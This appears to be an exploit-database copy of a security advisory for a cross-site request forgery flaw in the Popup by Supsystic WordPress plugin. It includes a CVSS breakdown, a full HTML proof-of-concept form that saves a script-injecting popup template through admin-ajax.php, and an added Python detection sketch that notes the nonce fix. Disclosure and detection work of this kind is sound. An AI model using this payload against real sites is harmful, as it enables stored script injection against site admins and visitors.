WordPress Popup By Supsystic 1.7.6 Cross Site Request Forgery
CVE: CVE-2019-9166
Category: CWE-352
Price: $500
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2017-03-03
CVSS vector description

Attack vector (AV): Network
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).

Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.

Privileges Required (PR): None
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.

Confidentiality (C): None
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.

Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.

Availability (A): None
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030016 Below is a copy:
WordPress Popup By Supsystic 1.7.6 Cross Site Request Forgery
------------------------------------------------------------------------
Popup by Supsystic WordPress plugin vulnerable to Cross-Site Request
Forgery
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability exists in the Popup by
Supsystic WordPress Plugin. This vulnerability allows attackers to add
and modify scripting code that will target authenticated WordPress
admins or visitors that see the popup generated by this plugin. Before
exploitation of this issue succeeds, and scripting code is therefore
injected, a victim WordPress admin needs to click a specially crafted
link or visit a malicious attacker-controlled webpage.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0013
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Popup by Supsystic WordPress
plugin version 1.7.6.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="params[main][show_on]" value="page_load" />
<input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
<input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
<input type="hidden" name="params[main][close_on]" value="user_close" />
<input type="hidden" name="params[main][show_pages]" value="all" />
<input type="hidden" name="params[main][show_time_from]" value="12:00am" />
<input type="hidden" name="params[main][show_time_to]" value="12:00am" />
<input type="hidden" name="params[main][show_date_from]" value="" />
<input type="hidden" name="params[main][show_date_to]" value="" />
<input type="hidden" name="params[main][show_to]" value="everyone" />
<input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
<input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
<input type="hidden" name="params[main][count_times_num]" value="1" />
<input type="hidden" name="params[main][count_times_mes]" value="day" />
<input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
<input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips]" value="" />
<input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
<input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
<input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url]" value="" />
<input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
<input type="hidden" name="params[tpl][width]" value="400" />
<input type="hidden" name="params[tpl][width_measure]" value="px" />
<input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
<input type="hidden" name="params[tpl][bg_img_0]" value="" />
<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
<input type="hidden" name="params[tpl][bg_img_1]" value="" />
<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
<input type="hidden" name="params[tpl][font_label]" value="default" />
<input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
<input type="hidden" name="params[tpl][font_txt_0]" value="default" />
<input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
<input type="hidden" name="params[tpl][font_footer]" value="default" />
<input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
<input type="hidden" name="params[tpl][responsive_mode]" value="def" />
<input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
<input type="hidden" name="params[tpl][close_btn]" value="while_close" />
<input type="hidden" name="params[tpl][bullets]" value="lists_green" />
<input type="hidden" name="layered_style_promo" value="1" />
<input type="hidden" name="params[tpl][layered_pos]" value="" />
<input type="hidden" name="params[tpl][enb_label]" value="1" />
<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
<input type="hidden" name="params[tpl][anim_key]" value="none" />
<input type="hidden" name="params[tpl][anim_duration]" value="" />
<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
<input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
<input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
<input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
<input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
<input type="hidden" name="test_email" value="[email protected] " />
<input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
<input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
<input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
<input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
<input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
<input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="[email protected] " />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="[email protected] " />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
<input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
<input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
<input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
<input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
<input type="hidden" name="stat_from_txt" value="" />
<input type="hidden" name="stat_to_txt" value="" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" />
<script>alert("xss")</script>
<div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell">
<a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a>
<div class="ppsInnerTblContent">
<div class="ppsPopupListsInner ppsPopupInner">
[if enb_label]
<div class="ppsPopupLabel ppsPopupListsLabel">[label]</div>
[endif]
<div style="clear: both;"></div>
[if enb_txt_0]
<div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0">
[txt_0]
</div>
[endif]
[if enb_subscribe]
<div class="ppsSubscribeShell">
[sub_form_start]
[sub_fields_html]
<input type="submit" name="submit" value="[sub_btn_label]" />
[sub_form_end]
<div style="clear: both;"></div>
</div>
[endif]
<div style="clear: both;"></div>
<div class="ppsRightCol">
[if enb_sm]
<div style="clear: both;"></div>
<div class="ppsSm">
[sm_html]
</div>
[endif]
[if enb_foot_note]
<div class="ppsFootNote">
[foot_note]
</div>
[endif]
</div>
</div>
</div>
</div>
" />
<input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
<input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
<input type="hidden" name="mod" value="popup" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="id" value="100" />
<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="pl" value="pps" />
<input type="hidden" name="reqType" value="ajax" />
<input type="submit"/>
</form>
</body>
</html>
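
A detection sketch for the request shape shown in the proof of concept, added here as an example and not part of the original advisory or the plugin's code. It flags popup save calls (the `pl`, `mod` and `action` values from the form above) that arrive from a foreign origin or carry a script tag in the `html` template field. The request record layout and the hosts blog.example and attacker.example are assumptions, constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Fields that identify the popup "save" call, copied from the PoC form above.
SAVE_MARKERS = {"pl": "pps", "mod": "popup", "action": "save"}
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)

def origin_of(url):
    """Reduce a URL to scheme://host[:port]; None if it is absent or opaque ("null")."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def audit_request(req, site_origin):
    """Findings for one captured request; empty list if it is not a suspicious save."""
    if req["method"] != "POST":
        return []
    if not urlsplit(req["url"]).path.endswith("/wp-admin/admin-ajax.php"):
        return []
    form = parse_qs(req["body"], keep_blank_values=True)
    if any(form.get(k, [""])[-1] != v for k, v in SAVE_MARKERS.items()):
        return []
    headers = {k.lower(): v for k, v in req["headers"].items()}
    source = origin_of(headers.get("origin")) or origin_of(headers.get("referer"))
    findings = []
    if source is None:
        findings.append("no-origin-or-referer")
    elif source != site_origin.lower():
        findings.append("cross-site-origin:" + source)
    if any(SCRIPT_RE.search(v) for v in form.get("html", [])):
        findings.append("script-in-html-template")
    return findings

# Constructed sample traffic (hypothetical hosts blog.example / attacker.example).
SITE = "https://blog.example"
AJAX = SITE + "/wp-admin/admin-ajax.php"
SAVE = {"pl": "pps", "mod": "popup", "action": "save", "id": "100", "reqType": "ajax"}
SAMPLES = [
    {"method": "POST", "url": AJAX, "headers": {"Origin": SITE},
     "body": urlencode({**SAVE, "html": "<div>[label]</div>"})},
    {"method": "POST", "url": AJAX, "headers": {"Origin": "https://attacker.example"},
     "body": urlencode({**SAVE, "html": '<script>alert("xss")</script>'})},
    {"method": "POST", "url": AJAX, "headers": {"Referer": SITE + "/wp-admin/"},
     "body": urlencode({"action": "heartbeat"})},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_request(sample, SITE))
```

An origin check like this only detects the forged request after the fact; the server-side remedy for CWE-352 in a WordPress AJAX handler is a per-user nonce verified with `check_ajax_referer()` together with a `current_user_can()` capability check.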